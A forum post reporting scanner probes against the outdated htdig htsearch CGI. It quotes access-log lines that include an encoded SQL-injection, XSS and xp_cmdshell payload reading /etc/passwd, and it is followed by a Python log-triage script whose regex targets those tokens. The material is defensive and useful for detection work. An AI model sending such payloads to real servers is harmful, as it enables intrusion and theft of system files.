htdig-3.2.0b6 XSS
by jayjwa from LinuxQuestions.org on (#6PEJ4)
Lately I've been seeing this stuff in the logs:
Code:
179.60.150.123 - - [23/Jul/2024:10:40:54 -0400] "GET /cgi-bin/htsearch?config=htdig&restrict=1&exclude=1&words=1&zeuP%3D5620%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 1768 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"
179.60.150.123 - - [23/Jul/2024:10:40:56 -0400] "GET /cgi-bin/htsearch?config=htdig&restrict=1&exclude=1&words=1 HTTP/1.1" 200 1768 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"
179.60.150.123 - - [23/Jul/2024:10:40:56 -0400] "GET /cgi-bin/htsearch?config=3644&restrict=1&exclude=1&words=1 HTTP/1.1" 200 373 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"
179.60.150.123 - - [23/Jul/2024:10:40:57 -0400] "GET /cgi-bin/htsearch?config=4631&restrict=1&exclude=1&words=1 HTTP/1.1" 200 373 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"

https://cve.mitre.org/cgi-bin/cvenam...=CVE-2007-6110
https://www.exploit-db.com/exploits/30818
Tested vulnerable, htdig-3.2.0b6, on Apache httpd-2.4.62, Current. The project looks dead, with the last release 20 years ago. Some of the other distros might have a patch for it but I can't seem to find one right now.
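For anyone who wants to pick requests like the ones quoted above out of their own access log, here is a small triage script. It is an added example, not part of the original post or of ht://Dig; the allow-list of parameter names, the token patterns and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Assumption: the parameter names this site's search form legitimately sends
# (the four seen in the post's benign request); extend to match your form.
ALLOWED_PARAMS = {"config", "restrict", "exclude", "words"}
# Tokens that have no business in a search request to this endpoint.
SUSPICIOUS = re.compile(
    r"<\s*script|union\s+(?:all\s+)?select|information_schema|xp_cmdshell|\.\./",
    re.IGNORECASE)
# Apache combined log format, up to the request target.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) ')

def scan(lines, path="/cgi-bin/htsearch"):
    """Return {client_ip: [findings]} for requests to the htsearch CGI."""
    findings, configs = defaultdict(list), defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        url = urlsplit(m["target"]) if m else None
        if url is None or url.path != path:
            continue
        # parse_qsl percent-decodes both names and values; keep_blank_values
        # keeps a payload sent as a value-less parameter *name* visible.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == "config":
                configs[m["ip"]].add(value)
            if name not in ALLOWED_PARAMS:
                findings[m["ip"]].append(f"unexpected parameter: {name[:30]!r}")
            hit = SUSPICIOUS.search(f"{name}={value}")
            if hit:
                findings[m["ip"]].append(f"suspicious token: {hit.group(0)!r}")
    # One client trying several config names looks like probing, not searching.
    for ip, seen in configs.items():
        if len(seen) > 1:
            findings[ip].append(f"cycled config values: {sorted(seen)}")
    return dict(findings)

# Constructed sample lines (documentation addresses, shortened payload).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2025:00:00:01 +0000] "GET /cgi-bin/htsearch?config=htdig&words=1&q%3D1%20UNION%20ALL%20SELECT%20%27%3Cscript%3Ex%3C%2Fscript%3E%27 HTTP/1.1" 200 1768 "-" "-"',
    '203.0.113.7 - - [01/Jan/2025:00:00:02 +0000] "GET /cgi-bin/htsearch?config=1234&words=1 HTTP/1.1" 200 373 "-" "-"',
    '198.51.100.9 - - [01/Jan/2025:00:00:03 +0000] "GET /cgi-bin/htsearch?config=htdig&words=linux HTTP/1.1" 200 1768 "-" "-"',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Because the whole payload in the quoted request arrives as a percent-encoded parameter name with no value, matching on values alone would miss it; the script checks both.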